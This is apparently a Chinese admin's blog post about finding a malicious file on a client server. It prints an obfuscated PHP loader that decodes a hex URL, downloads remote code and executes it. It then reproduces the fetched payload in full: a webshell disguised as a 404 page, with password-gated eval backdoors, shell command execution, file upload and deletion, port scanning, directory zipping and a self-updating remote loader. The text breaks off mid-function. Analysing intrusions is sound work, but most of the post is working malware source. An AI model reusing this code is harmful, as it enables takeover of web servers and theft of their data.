晚上客户反映服务器最近流量有些异常,于是就去查看服务器日志,为了自身方便,写了一个文件来查询
<?php $ua_file = "ua.txt"; $ua_data = date("Y/m/d H:i:s")."----".$_SERVER['REMOTE_ADDR']."\n"; $ua_data = $ua_data."http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']."\n"; $ua_data = $ua_data.$_SERVER['HTTP_USER_AGENT']."\n"; $ua_data = $ua_data.$_SERVER['HTTP_REFERER']."\n"; $ua_data = $ua_data."\n"; $ffff = fopen($ua_file, 'a'); fwrite($ffff, $ua_data); fclose($ffff); ?>
可是其中的一请求的文件引起了我的注意,直接打开看看~
<?php define('iphp','oday'); define('T','H*'); define('A','call'); define('B','user'); define('C','func'); define('D','create'); define('E','function'); define('F','file'); define('F1','get'); define('F2','contents'); define('P','pack'); $p = P; $call = sprintf('%s_%s_%s',A,B,C); $create = sprintf('%s_%s',D,E); $file = sprintf('%s_%s_%s',F,F1,F2); $t = array('6','8','7','4','7','4','7','0','3','a','2','f','2','f','6','4','6','f','6','4','6','f','6','4','6','f','6','d','6','5','2','e','7','3','6','9','6','e','6','1','6','1','7','0','7','0','2','e','6','3','6','f','6','d','2','f','6','7','6','5','7','4','6','3','6','f','6','4','6','5','2','e','7','0','6','8','7','0','3','f','6','3','6','1','6','c','6','c','3','d','6','3','6','f','6','4','6','5'); $call($create(null,$p(T,$file($p(T,join(null,$t)))))); ?>
于是随手解密了下,发现函数的原型是这样子的
<?php define('iphp','oday'); define('T','H*'); define('A','call'); define('B','user'); define('C','func'); define('D','create'); define('E','function'); define('F','file'); define('F1','get'); define('F2','contents'); define('P','pack'); $p = P; //pack //明显的对函数进行拼接 $call = sprintf('%s_%s_%s',A,B,C); //call_user_func 调用自定义的函数 $create = sprintf('%s_%s',D,E); //create_function 创建自定义函数 $file = sprintf('%s_%s_%s',F,F1,F2); //file_get_contents 远程文件读取 $t = array('6','8','7','4','7','4','7','0','3','a','2','f','2','f','6','4','6','f','6','4','6','f','6','4','6','f','6','d','6','5','2','e','7','3','6','9','6','e','6','1','6','1','7','0','7','0','2','e','6','3','6','f','6','d','2','f','6','7','6','5','7','4','6','3','6','f','6','4','6','5','2','e','7','0','6','8','7','0','3','f','6','3','6','1','6','c','6','c','3','d','6','3','6','f','6','4','6','5'); //$call($create(null,$p(T,$file($p(T,join(null,$t)))))); //join(null,$t) join() 函数把数组元素组合为一个字符串 call_user_func(create_function(null,pack(H*,file_get_contents(H*,join(null,$t))))); ?>
其中的join(null,$t)得到的是
687474703a2f2f646f646f646f6d652e73696e616170702e636f6d2f676574636f64652e7068703f63616c6c3d636f6465
然后$p(T,join(null,$t));的到的结果是
http://dododome.sinaapp.com/getcode.php?call=code
那么一目了然了,从http://dododome.sinaapp.com/getcode.php?call=code读取到的东西,经过pack解码,然后直接调用
//<?php // +---------------------------------------------------------------------- // | Copyright (c) 2006-2012 KingBin All rights reserved. // +---------------------------------------------------------------------- // | Licensed ( http://www.apache.org/licenses/LICENSE-2.0 ) // +---------------------------------------------------------------------- // | Author: KingBin ooooooo.oooo.ooooooo@foxmail.com // +---------------------------------------------------------------------- error_reporting(0); define('KING_SELF', basename($_SERVER["SCRIPT_FILENAME"])); define('IS_WIN', 'win' == substr(strtolower(PHP_OS), 0, 3)); defined('mamashuoanquangoushigehenrongyiguodedashaguaruanjian') or define('mamashuoanquangoushigehenrongyiguodedashaguaruanjian', 'demo'); date_default_timezone_set('asia/shanghai'); //新增过狗验证 if(defined('iphp')) define('_pass_',iphp); else define('_pass_',mamashuoanquangoushigehenrongyiguodedashaguaruanjian); //结束 if (!isset($_SESSION)) { session_start(); } function init() { remote_e(); header("Content-type:text/html;charset=utf-8"); session(); //update(); $do = new king; $do->start(); } function remote_e() { $pass = $_REQUEST['pass']; $e = $_REQUEST['e']; if ($pass == _pass_) { if ($e) eval($e); die; } } function _getcwd() { return $_SESSION['dirpath'] . '/'; } function kill($process) { $wmi = new COM("Winmgmts:/root/cimv2"); $data = $wmi->ExecQuery(sprintf("SELECT * FROM Win32_Process Where Name='%s'", $process)); foreach ($data as $v) { $v->Terminate(); } } function session() { $sessid = empty($_COOKIE[session_name()]) ? $_COOKIE[session_name()] : null; if ($sessid) session_id($sessid); } function update() { $code = "<?php session_start(); define('version','v2'); define('pp', '{pass}'); if(isset(\$_SESSION['k'])){ \$k = \$_SESSION['k']; }else{ \$_SESSION['k'] = pack('H*',file_get_contents(pack('H*','687474703a2f2f66696c652e6865696c6979752e636f6d2f676574636f64652e7068703f63616c6c3d636f6465'))); \$k = \$_SESSION['k']; } call_user_func(create_function(null,\$k)); ?> "; $pass = _pass_; $contents = str_replace('{pass}', $pass, $code); if (!defined('version') || version != 'v2') { file_put_contents(KING_SELF, $contents); //header('location:' . KING_SELF); } } function I($name) { return $_REQUEST[$name]; } //已经废弃 function _king($key) { $opts = array('http' => array('method' => 'GET', 'timeout' => 10)); $context = stream_context_create($opts); if (isset($_SESSION['code'])) { $code = bin::decode($_SESSION['code'], $key); } else { $_SESSION['code'] = $GLOBALS['p']('H*', $GLOBALS['f']($GLOBALS['s']('%s/%s', $GLOBALS['p'] ('H*', '687474703a2f2f626c616b696e2e64756170702e636f6d2f'), $key)), false, $context); $code = $GLOBALS['s']('%s', @bin::decode($_SESSION['code'], $key)); } //这里很重要针对5.3 以上匿名优化 $GLOBALS['c']($GLOBALS['e'](false, $code)); } //end function css() { $code = <<< css <style> input{font:11px Verdana;height:18px;border:1px solid #666666;}a{color:#00f;text-decoration:underline;}a:hover{color:#f00;text-decoration:none;}#header{height:20px;border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#e9e9e9;padding:5px 15px 5px 5px;font-weight:bold;}#header .left{float:left;}#header .right{float:right;}#menu{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#f1f1f1;padding:5px 15px 5px 5px;}#content{margin:0 auto;width:98%;}#content h2{margin-top:15px;padding:0;height:24px;line-height:24px;font-size:14px;color:#5B686F;}#content #base,#content #base2{background:#eee;margin-bottom:10px;}#base input{float:right;border-color:#b0b0b0;background:#3d3d3d;color:#ffffff;font:12px Arial,Tahoma;height:22px;margin:5px 10px;}.cdrom{padding:5px;margin:auto 7px;}.h{margin-top:8px;}#base2 .input{font:12px Arial,Tahoma;background:#fff;border:1px solid #666;padding:2px;height:18px;}#base2 .bt{border-color:#b0b0b0;background:#3d3d3d;color:#ffffff;font:12px Arial,Tahoma;height:22px;}dl,dt,dd{margin:0;}.focus{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#ffffaa;padding:5px 15px 5px 5px;}.fff{background:#fff}dl{margin:0 auto;width:100%;}dt,dd{overflow:hidden;border-top:1px solid white;border-bottom:1px solid #DDD;background:#F1F1F1;padding:5px 15px 5px 5px;}dt{border-top:1px solid white;border-bottom:1px solid #DDD;background:#E9E9E9;font-weight:bold;padding:5px 15px 5px 5px;}dt span,dd span{width:19%;display:inline-block;text-indent:0em;overflow:hidden;}#footer{padding:10px 30px;border-bottom:1px solid #fff;border-top:1px solid #ddd;background:#eee;}#load{position:fixed;right:0;border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#ffffaa;padding:5px 15px 5px 5px;display:none;}.in{width:40px;text-align:center;}.high{background-color:#0449BE;color:white;margin:0 2px;padding:2px 3px;width:10px;}.high2{margin:0 2px;padding:2px 0px;width:10px;}#login{display:none;}#show_file{padding: 10px 10px;border: #000 solid;color:#000;height:400px;width:800px;position:fixed;top:45%;left:50%;margin-top:-200px;margin-left:-400px;background:#fff;overflow:auto;}#open,#upload{display:none;position:fixed;top:45%;left:50%;margin-top:-200px;margin-left:-400px;}#close{color:#fff;height:16px;width:30px;position:absolute;right:0;background:#000;z-index:1;}#upfile{width:628px;height:108px;padding:10px 20px;background-color:white;position:fixed;top:45%;left:50%;margin-top:-54px;margin-left:-314px;border:#000 solid;} #login{display:none;} body{font:14px Arial,Tahoma;line-height:16px;margin:0;padding:0;} h1{display: block;font-size: 32px;font-weight: bold;font-family:none;} .not_found{margin:20px 20px;} .not_found p{font-family:none;font: 14px Arial,Tahoma;line-height: 16px;} in{border:1px;} .red{color:#FF0085;} #base2 .input{width:260px;} .hide{display:none;} .showfile {font-size: 16px;line-height: 28px;} </style> css; return $code; } function js() { $code = <<< js <script> (function() { function _key() { $(document).keydown(function(e) { var key = (e.keyCode) || (e.which) || (e.charCode); if (key == 80) { $(".not_found").hide(); $("#login").show(); } }); } function error(msg, element, speed) { speed = speed || "3000"; //setTimeout('$(element).show("slow")',speed); $(element).show(); $(element).text(msg); setTimeout( function() { $(element).hide(); } , speed); } function post(element, url, form) { $(element).click(function() { $.get(url, $(form).serialize(), function(data) { if (data.status == 100) { error(data.msg, '#notice', 2000); }else{ $("body").html(data.html); //bind default event _init(); } }, "json"); }); } function close(){ $("#close").click(function(){ $("#open").hide(); }); $("#close_file").click(function(){ $("#upfile").hide(); }); } function get(element){ $(element).on('click',function(e){ $.get(this.href,function(data){ if(data == null){ error('权限不足,无法查看!', '#load', 2000); } if(data.showfile){ $("#open").show(); $('#show_file').empty(); $('#show_file').append(data.showfile); } if(data.editfile){ if($(window).scrollTop()>0) $('body,html').animate({scrollTop:0},1000); $(".newfile").show(); $(".newfile_name").empty(); $(".newfile_name").val(data.filename); $(".newfile_value").empty(); $(".newfile_value").text(data.editfile); } if(data.html) { $("body").html(data.html); //bind default event _init(); } if(data.msg){ error(data.msg, '#load', 2000); } if(data.status==200){ //window.location.href={gourl} window.location.reload(); } },"json"); e.preventDefault(); return false; }); return false; } function find(){ $('.qh').click(function(){ var find = $('.find').val(); if( find == null){ error('切换的路径不能为空', '#load', 2000); } $.get('?action=find&file='+find,function(data){ if(data == null){ error('切换的路径不能为空!', '#load', 2000); } if(data.html) { $("body").html(data.html); //bind default event _init(); } if(data.msg){ error(data.msg, '#load', 2000); } },"json"); }); } function port(){ $(".click_port").click(function(){ $('.port_hide').toggle(); $(".findport").click(function(){ error("正在扫描端口,请耐心等待", '#load', 2000); var port = $('.port').val(); $.get('?action=port&ports='+port,function(data){ if(data.showfile){ $("#open").show(); $('#show_file').empty(); $('#show_file').append(data.showfile); } if(data.msg){ error(data.msg, '#load', 2000); } },"json"); }); }); } function upload(){ $('.upload').click(function(){ $('#upfile').toggle(); }); $(".postfile").click(function(){ $('#upfile').hide(); $("#form1").submit(); }); } function runphp(){ $(".run_php").click(function(){ $('.runphp_hide').toggle(); $(".runphp_click").click(function(){ error("正在执行php代码,请耐心等待", '#load', 2000); var port = $('.runphp_value').val(); $.get('?action=runphp&codes='+port,function(data){ if(data.showfile){ $("#open").show(); $('#show_file').empty(); if(data.showfile==null){ error("语句执行错误,或者执行的函数被禁用!", '#load', 2000); } $('#show_file').append(data.showfile); } if(data.msg){ error(data.msg, '#load', 2000); } },"json"); }); }); } function run_command(){ $(".run_command").click(function(){ $('.runcommand_hide').toggle(); $(".runcommand_click").click(function(){ error("正在执行命令,请耐心等待", '#load', 2000); var port = $('.runcommand_value').val(); $.get('?action=runcommand&codes='+port,function(data){ if(data.showfile){ $("#open").show(); $('#show_file').empty(); if(data.showfile){ error("命令执行成功!", '#load', 2000); $('#show_file').append('<pre>'+data.showfile+'</pre>'); } } if(data.msg){ error(data.msg, '#load', 2000); } },"json"); }); }); } function newfile(){ $("._newfile").click(function(){ $(".newfile").toggle(); }); $(".newfile_click").click(function(){ var name = $(".newfile_name").val(); var contents = $(".newfile_value").val(); if(name==''){ error("新建文件不能为空!", '#load', 2000); return false; } if(contents==''){ error("新建内容不能为空!", '#load', 2000); return false; } if(name && contents){ $.post('?action=createfile',{file:name,body:contents},function(data){ if(data.html) { $("body").html(data.html); //bind default event _init(); } if(data.msg){ error(data.msg, '#load', 2000); } },"json"); } }); } function newfolder(){ $("._newfolder").click(function(){ $(".newfolder").toggle(); }); $(".newfolder_click").click(function(){ var name = $(".newfolder_name").val(); if(name==''){ error("新建文件夹不能为空!", '#load', 2000); return false; } if(name){ $.post('?action=newfolder',{file:name},function(data){ if(data.html) { $("body").html(data.html); //bind default event _init(); } if(data.msg){ error(data.msg, '#load', 2000); } },"json"); } }); } function pay(){ $('.pay').click(function(){ alert('付费模块正在努力制作中!'); }); } function _init() { $(function($) { _key(); url = $("#submit").attr('data_url'); post('#submit',url, '#f_login'); get('.action_del'); close(); find(); port(); runphp(); upload(); run_command(); newfile(); newfolder(); pay(); $('.packages').click(function(){ error('打包时间比较长,请耐心等待。。或者进行其他操作。。', '#load', 5000); }); }); } _init(); })(); </script> js; return $code; } function _html() { $code = <<< CODE <!DOCTYPE HTML> <head> <meta http-equiv="content-type" content="text/html" /> <meta http-equiv="content-type" charset="UTF-8" /> <title>404 Not Found</title> {load_css} <script src="http://lib.sinaapp.com/js/jquery/1.8/jquery.min.js"></script> {load_js} </head> <body> <div id="notice" style="position:fixed;right:0;border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#ffffaa;padding:5px 15px 5px 5px;display: none; font-size:12px;"></div> <div class="not_found"> <h1>Not Found</h1> <p>The requested URL /{url} was not found on this server.</p> </div> <div id="login"> <form action="" method="GET" id="f_login"> <span style="font:11px Verdana;"> Password: </span> <input id="pwd" name="password" type="password" size="20" /> <input id="submit" data_url="{url}" type="button" value=" login " /> </form> </div> </body> </html> CODE; return str_replace(array( '{url}', '{load_css}', '{load_js}'), array( KING_SELF, css(), js()), $code); } function class_html() { $code = <<< code <!DOCTYPE HTML> <head> <meta http-equiv="content-type" content="text/html" /> <meta http-equiv="content-type" charset="UTF-8" /> <title>404 Not Found</title> {load_css} <script src="http://lib.sinaapp.com/js/jquery/1.8/jquery.min.js"></script> {load_js} </head> <body> {body} </body> </html> code; return $code; } function class_body() { $code = <<< code <div id="load"> </div> <div class='hide' id="upfile"> <p></p><p></p><p><a href="javascript:;;;" id="close_file">点我关闭</a></p> <form action="?action=upload" id="form1" name="form1" encType="multipart/form-data" method="post" target="hidden_frame"> <input name="action" value="upload" type="hidden" /> <input type="file" id="userfile" name="userfile"> <INPUT class="postfile" type="button" value="上传文件"> <iframe name="hidden_frame" id="hidden_frame" style="display:none"></iframe> </form> </div> <div id="open"> <div style="position:relative;"> <div id="close">关闭</div> </div> <div id="show_file" class="showfile"> </div> </div> <div id="header"> <div class="left"> {host}({ip}) </div> <div class="right"> OS:{uname} {software} php {php_version} </div> </div> <div id="menu"> {menu} </div> <div id="content"> <h2>文件管理 - 当前磁盘空间 <span id="disktotal">{space_total}</span> 运行用户:{whoami}</h2> <div id="base"> <div class="cdrom"> <span id="listdir"> {current_dir}</span> </div> <div class="cdrom"> {all_dir} </div> </div> <div class="h"></div> <div id="base2"> <div class="cdrom"> {action} </div> <div class="cdrom"> 切换路径: <input class="input find" name="findstr" value="" type="text" /> <input class="bt qh" value="切换" type="submit" /> </div> <div class="cdrom runcommand_hide hide"> 运行命令: <input class="input runcommand_value" name="runphp" value="" type="text"/> <input class="bt runcommand_click" value="运行" type="submit" /> </div> <div class="cdrom port_hide hide"> 扫描端口: <input class="input port" name="findstr" value="21,22,25,80,3306,9000,11211" type="text" /> <input class="bt findport" value="扫描" type="submit" /> </div> <div class="cdrom runphp_hide hide"> 运行php: <textarea class="input runphp_value" name="runphp" value="" type="text" style="width:600px;height:200px;"/></textarea> <input class="bt runphp_click" value="运行" type="submit" /> </div> <!--new file --> <div class="cdrom hide newfile"> 新建文件: <input class="input newfile_name" style="font-size:16px;color:blue;" name="findstr" value="" type="text" /> <div style="margin-top:10px;"> 新建内容: <textarea class="input newfile_value" name="runphp" value="" type="text" style="width:600px;height:200px;font-size:16px;color:blue;line-height: 28px;"/></textarea> <input class="bt newfile_click" value="新建" type="submit" /> </div> </div> <!--end--> <div class="cdrom hide newfolder"> 新文件夹: <input class="input newfolder_name" name="findstr" value="" type="text" /> <input class="bt newfolder_click" value="新建" type="submit" /> </div> </div> <!-- return --> <div id="show"> <dl> <dt> <span class="in"> </span> <span>文件名</span> <span>修改时间</span> <span>文件大小</span> <span>权限</span> <span>操作</span> </dt> <dd > <span class="in"> - </span> <span> <a class='action_del' href="?action=up">返回上一目录</a> </span> <span></span> <span></span> <span></span> <span></span> </dd> <!-- file --> {showfile} <!-- file end --> </dl> </div> <!-- page start--> <!-- end --> </div> <div class="h"></div> <div id="footer"> 当前版本:2.0 一句话连接提供 {http}/{k}?pass={p} 密码是e</span> </div> code; return str_replace(array('{http}', '{k}', '{p}'), array($_SERVER["HTTP_HOST"], KING_SELF, _pass_), $code); } function show_html() { $code = <<< code <dd class="{color}" onmouseover="this.className='focus'" onmouseout="this.className='{color}'"> <span class="in"> <input name="" type="checkbox"> </span> <span> <a class="action_del {.red}" href="{self}?action=view&file={file}" name="" >{return_file}</a> </span> <span> <a href="javascript:;;;" name="" >{return_time}</a> </span> <span>{return_size}</span> <span> <a href="javascript:;;;" name="" >{return_chmod}</a> / <a href="javascript:;;;" name="">{return_perms}</a> </span> <span> {is_folder} </span> </dd> code; return $code; } function pages() { $code = <<< code <div id="pages"> <dl> <dd> <span class="in"> </span> <span></span> <span></span> <span></span> <span style="text-align:right;width:38%"> <a class="high2" href="javascript:;;;" name="action=show&dir=$_ipage_file&page=1" >Index</a> <a class="high2" href="javascript:;;;" name="action=show&dir=$_ipage_file&page=$previous" >Previous</a> {pages} <a class="high2" href="javascript:;;;" name="action=show&dir=$_ipage_file&page=$next" >Next</a> <a class="high2" href="javascript:;;;" name="action=show&dir=$_ipage_file&page=$nums" >End</a> </dd> </dl> </div> code; } function _login() { $password = I('password'); //去掉原有key保护改为用户自定义密码[服务端已修改] //&& NULL == bin::decode($GLOBALS['p']('H*', $GLOBALS['f']($GLOBALS['s']('%s/%s', $GLOBALS['p']('H*', '687474703a2f2f626c616b696e2e64756170702e636f6d2f'), $key))), $key) if (isset($password) && $password !=_pass_) { die('{"status":"100","msg":"密码不对"}'); } echo _html(); } function _logout() { setcookie(session_name(),null, time() - 86400); session_destroy(); } function is_ajax() { if (strtolower($_SERVER['HTTP_X_REQUESTED_WITH']) == 'xmlhttprequest') return true; } function run() { $action = new run(); $action->index(); } function _is_login() { $cookie = !empty($_SESSION['_king_key']) ? pack('H*', $_SESSION['_king_key']) : null; $key = I('password') ? I('password') : $cookie; if (_pass_ == $key) { if ($_SESSION['_king_key'] != bin2hex(_pass_)) { //setcookie('_king_key', bin2hex($key), time() + 86400); setcookie(session_name(), session_id(), time() + 86400); $_SESSION['_king_key'] = bin2hex($key); } run(); } else _login(); } class run { function index() { $action = I('action') ? I('action') : null; if (isset($action)) { if (method_exists($this, $action)) $this->$action(); } else { $this->dump(); } } function restart() { if (!IS_WIN) { die('{"msg":"非常抱歉,此操作仅限windows系统"}'); } if (!class_exists('COM')) { die('{"msg":"非常抱歉,此机器不支持重启"}'); } //尝试重启 kill('services.exe'); die('{"msg":"正在尝试重启服务器系统,如不是system权限请放弃操作!"}'); } function find() { $dir = $this->gbk_mbstring(I('file')); if (is_dir($dir)) { $this->setpath($dir); $this->dump(); } } function hello() { $i = I('world'); if ($i) { eval($i); } exit; } function createfile() { $filename = I('file'); $contents = I('body'); if (isset($filename) && isset($contents)) { if (true == file_put_contents(_getcwd() . $filename, $contents)) { $this->dump('新建文件成功!'); } else { $this->dump('新建文件失败!'); } } } function newfolder() { $filename = I('file'); if (isset($filename)) { if (is_dir(_getcwd() . $filename)) { die('{"msg":"文件夹已经存在"}'); } if (true == mkdir(_getcwd() . $filename, 0777)) { $this->dump('新建文件夹成功!'); } else { $this->dump('新建文件夹失败!'); } } } function editfile(){ if(IS_WIN) $filename = I('file') ? $this->gbk_mbstring(pack("H*", I('file'))) : null; else $filename = I('file') ? $this->mbstring(pack("H*", I('file'))) : null; if (is_file($filename)) { ob_start(); echo file_get_contents($filename); $contents = ob_get_clean(); echo sprintf('{"editfile":%s,"filename":"%s"}', json_encode($this->mbstring($contents)),basename($filename)); } } function rmdir() { if(IS_WIN) $dir = I('file') ? $this->gbk_mbstring(pack("H*", I('file'))) : null; else $dir = I('file') ? $this->mbstring(pack("H*", I('file'))) : null; $files = array_diff(scandir($dir), array('.', '..')); foreach ($files as $file) { (is_dir("$dir/$file")) ? $this->rmdir("$dir/$file") : unlink("$dir/$file"); } if(true==rmdir($dir)){ $this->dump('文件夹删除成功!'); }else{ die('{"msg":"文件夹删除失败!"}'); } } function phpinfo() { $html = <<< code <pre> php参数查看 ====================================== 禁用的函数: {disable_function} 禁用的类 :{class} 支持的拓展 : {ext} 加载的项目 : {include} 前置调用 : {pre} 后置调用 :{next} 内存设置大小 : {mem} php.ini 路径 : {php} 最大上传 : {u} ======================================= code by blackbin </pre> code; $dis = ini_get('disable_functions'); $ext = join(',', get_loaded_extensions()); $in = ini_get('include_path'); $mem = ini_get('memory_limit'); $class = ini_get('disable_classes'); $php = php_ini_loaded_file(); $u = ini_get('upload_max_filesize'); $pre = ini_get('auto_prepend_file'); $next = ini_get('auto_append_file'); $code = str_replace(array( '{disable_function}', '{ext}', '{include}', '{mem}', '{class}', '{php}', '{u}', '{pre}', '{next}'), array( str_replace(',', '<br/> ', $dis), str_replace(',', '<br/> ', $ext), $in, $mem, $class, $php, $u, $pre, $next), $html); die(sprintf('{"showfile":%s}', json_encode($code))); } function port() { $port = explode(',', I('ports')); foreach ($port as $v) { if (true == $this->fsockopen($v)) { $yes[] = $v; } else { $no[] = $v; } } $html = <<< code <pre> 端口检测 ======================= 服务器开放端口:{yes} 服务器关闭端口:{no} ======================= </pre> code; $code = str_replace(array('{yes}', '{no}'), array(join(',', $yes), join(',', $no)), $html); die(sprintf('{"showfile":%s}', json_encode($code))); } function fsockopen($port) { $fp = fsockopen("127.0.0.1", $port, $errno, $errstr, 1); if (!$fp) { return false; } return true; } function runphp() { $codes = I('codes'); ob_start(); eval($codes); $c = ob_get_clean(); die(sprintf('{"showfile":%s}', json_encode($c))); } function runcommand() { $codes = I('codes'); ob_start(); echo `$codes`; $c = ob_get_clean(); die(sprintf('{"showfile":%s}', json_encode($this->mbstring($c)))); } function viewinfo() { phpinfo(); exit; } function logout() { _logout(); header('location:http://'.$_SERVER["HTTP_HOST"].'/'.KING_SELF); die('{"status":"200","msg":"你已成功退出!"}'); } function del() { if (IS_WIN) $file = I('file') ? $this->gbk_mbstring(pack("H*", I('file'))) : null; else $file = I('file') ? $this->mbstring(pack("H*", I('file'))) : null; if (isset($file)) { if (false == unlink($file)) { die('{"msg":"对不起,您没有删除此文件的权限!"}'); } else { $this->dump('成功删除文件!'); } } return; } function down() { if (IS_WIN) $filename = I('file') ? $this->gbk_mbstring(pack("H*", I('file'))) : null; else $filename = I('file') ? $this->mbstring(pack("H*", I('file'))) : null; if (isset($filename)) { if (file_exists($filename)) { $this->download($filename); } } return; } function linuxpkg() { if (IS_WIN) die('{"msg":"此功能仅限linux平台使用"}'); $disable_functions = ini_get('disable_functions'); if (strpos($disable_functions, 'shell_exec')) { die('{"msg":"非常抱歉,命令行已被禁用,请使用左边的打包功能!"}'); } $apath = pack('H*', $this->scriptroot()); $path = $_SESSION['dirpath']; $shell = sprintf('tar zcf %s.tar.gz %s', md5(uniqid()), $path); shell_exec($shell); $this->setpath($apath); $this->dump('亲,恭喜您,打包成功!'); } function packages() { if (!class_exists('ZipArchive')) { die('{"msg":"当前环境不支持打包!"}'); } $c = $this->_scandir($this->mbstring($_SESSION['dirpath'])); array_walk_recursive($c, array($this, 'tofile')); $res = $this->addzip(); if ($res) { //返回打包路径 $apath = pack('H*', $this->scriptroot()); $this->setpath($apath); $this->dump('亲,恭喜您,打包成功!'); } } function up() { $path = !empty($_SESSION['dirpath']) ? $_SESSION['dirpath'] : $this->basedir(); $_SESSION['dirpath'] = str_replace('\\', '/', $this->setpath(dirname($path))); $this->dump(); } //区分windows编码 windows gbk function view() { if (IS_WIN) $filename = I('file') ? $this->gbk_mbstring(pack("H*", I('file'))) : null; else $filename = I('file') ? $this->mbstring(pack("H*", I('file'))) : null; if (is_dir($filename)) { $this->setpath($filename); $this->dump(); } if (is_file($filename)) { ob_start(); show_source($filename); $contents = ob_get_clean(); echo sprintf('{"showfile":%s}', json_encode($this->mbstring($contents))); } } function upload() { $path = !empty($_SESSION['dirpath']) ? $_SESSION['dirpath'] : $this->basedir(); if (true == @file_put_contents($path . '/' . basename($_FILES['userfile']['name']), file_get_contents($_FILES['userfile']['tmp_name']))) { exit(' <script> parent.$("#load").show(); parent.$("#load").text("上传成功,刷新当前页面即可!"); setTimeout( function() { parent.$("#load").hide(); } , 2000); </script>'); } else { exit('<script> parent.$("#load").show(); parent.$("#load").text("上传失败!"); setTimeout( function() { parent.$("#load").hide(); } , 2000); </script>'); } } protected function dump($msg = null) { if (is_ajax()) { $this->dump_ajax($msg); } else { $this->dump_html(); } } //start function _scandir($path) { $path = $this->gbk_mbstring($path); $class = new DirectoryIterator($path); foreach ($class as $key => $fileinfo) { if ($fileinfo->getFilename() == '.' || $fileinfo->getFilename() == '..') continue; if ($fileinfo->isFile()) { $files[] = $this->mbstring($path) . '/' . $this->mbstring($fileinfo-> getFilename()); } if ($fileinfo->isDir()) { $dirs[] = $this->_scandir($path . '/' . $fileinfo->getFilename()); } } if (!isset($files)) $files = array(); if (!isset($dirs)) $dirs = array(); $return = array_merge($dirs, $files); return $return; } function trimpath($path) { return str_replace('\\', '/', $path); } function tofile($item, $key) { $GLOBALS['addzips'][] = array('pathname' => $item, 'filename' => ltrim(str_replace ($this->trimpath(dirname(__file__)), null, $item), '/')); } function addzip() { set_time_limit(0); $basename = md5(uniqid()) . '.zip'; $zip = new ZipArchive; if (!is_file($basename)) $res = $zip->open($basename, ZipArchive::CREATE); else $res = $zip->open($basename); if ($res === true) { foreach ($GLOBALS['addzips'] as $add) { if (basename($add['pathname']) == $basename) continue; $zip->addFile($this->gbk_mbstring($add['pathname']), $this->gbk_mbstring($add['filename'])); } $zip->close(); } else { die('{"msg":"不能创建打包程序,可能是目录没有读写权限!"}'); } return true; } //end function download($filename) { set_time_limit(0); $file = new SplFileObject($filename); header("Cache-Control: no-cache, must-revalidate"); header("Pragma: no-cache"); header("Content-Disposition: attachment; filename=" . $file->getbasename()); header("Content-Length: " . $file->getsize()); header("Content-Type: application/force-download"); header('Content-Description: File Transfer'); header('Content-Encoding: none'); header("Content-Transfer-Encoding: binary"); while (!$file->eof()) { echo $file->fgets(); } } protected function dump_ajax($msg = null) { if ($msg) { echo sprintf("{\"html\":%s,\"msg\":\"%s\"}", $this->ajax(), $msg); } else { echo sprintf("{\"html\":%s}", $this->ajax()); } } protected function dump_html() { $html = $this->html(); $menu = join(" | ", $this->menu()); $action = join(" | ", $this->action()); echo str_replace(array("{menu}", "{action}"), array($menu, $action), $html); } protected function is_utf8($str) { $c = 0; $b = 0; $bits = 0; $len = strlen($str); for ($i = 0; $i < $len; $i++) { $c = ord($str[$i]); if ($c > 128) { if (($c >= 254)) return false; elseif ($c >= 252) $bits = 6; elseif ($c >= 248) $bits = 5; elseif ($c >= 240) $bits = 4; elseif ($c >= 224) $bits = 3; elseif ($c >= 192) $bits = 2; else return false; if (($i + $bits) > $len) return false; while ($bits > 1) { $i++; $b = ord($str[$i]); if ($b < 128 || $b > 191) return false; $bits--; } } } return true; } protected function byte_format($size, $dec = 2) { $a = array( "B", "KB", "MB", "GB", "TB", "PB"); $pos = 0; while ($size >= 1024) { $size /= 1024; $pos++; } return round($size, $dec) . "" . $a[$pos]; } protected function html() { return str_replace(array( '{body}', '{load_css}', '{load_js}'), array( $this->body(), css(), js()), class_html()); } protected function ajax() { $html = $this->body(); $menu = join(" | ", $this->menu()); $action = join(" | ", $this->action()); $body = str_replace(array("{menu}", "{action}"), array($menu, $action), $html); return json_encode($body); } protected function body() { return str_replace(array( '{host}', '{ip}', '{uname}', '{software}', '{php_version}', '{whoami}', '{current_dir}', '{space_total}', '{all_dir}', '{showfile}', ), array( $this->host(), $this->ip(), $this->uname(), $this->soft(), $this->php_version(), $this->whoami(), $this->current_dir(), $this->space_total(), $this->all_dir(), $this->showfile(), ), class_body()); } protected function menu() { if (IS_WIN) { $restart = array( "重启系统", KING_SELF . "?action=restart", 'action_del'); } else { $restart = null; $unset = true; } $menus = array( array( "退出", KING_SELF . "?action=logout", null), array( "运行命令", 'javascript:;;;', 'run_command'), array( "端口扫描", 'javascript:;;;', 'click_port'), array( "运行php", 'javascript:;;;', 'run_php'), array( "php参数", KING_SELF . "?action=phpinfo", 'action_del'), array( "phpinfo", KING_SELF . "?action=viewinfo", null), array( "mysql管理(需付费购买)", 'javascript:;;;', 'pay'), $restart, ); if (isset($unset)) { array_pop($menus); } foreach ($menus as $menu) { $return[] = sprintf("<a class='%s' href=\"%s\">%s</a>", $menu[2], $menu[1], $menu[0]); } return $return; } protected function action() { $menus = array( array( "网站目录", KING_SELF . "?action=view&file=" . $this->webroot(), 'action_del'), array( "文件目录", KING_SELF . "?action=view&file=" . $this->scriptroot(), 'action_del'), array( "上传文件", 'javascript:;;;', 'upload'), array( "新建文件", "javascript:;;;", '_newfile'), array( "新建文件夹", "javascript:;;;", '_newfolder'), array( "打包当前路径(php功能)", KING_SELF . "?action=packages", 'action_del packages'), array( "打包当前路径(linux功能)", KING_SELF . "?action=linuxpkg", 'action_del packages'), array( "刷新本页", KING_SELF . "?action=view&file=" . bin2hex($_SESSION['dirpath']), 'action_del'), ); foreach ($menus as $menu) { $return[] = sprintf("<a class='%s' href=\"%s\">%s</a>", $menu[2], $menu[1], $menu[0]); } return $return; } protected function showfile($path = null) { $pathname = empty($path) ? $this->basedir() : pack('H*', $path); $filename = $this->scandir($pathname); if (isset($filename['dirs'])) { sort($filename['dirs']); foreach ($filename['dirs'] as $key => $value) { $basefile = $this->mbstring($pathname) . '/' . $value; $dirs[$key] = str_replace(array( '{self}', '{file}', '{return_file}', '{return_time}', 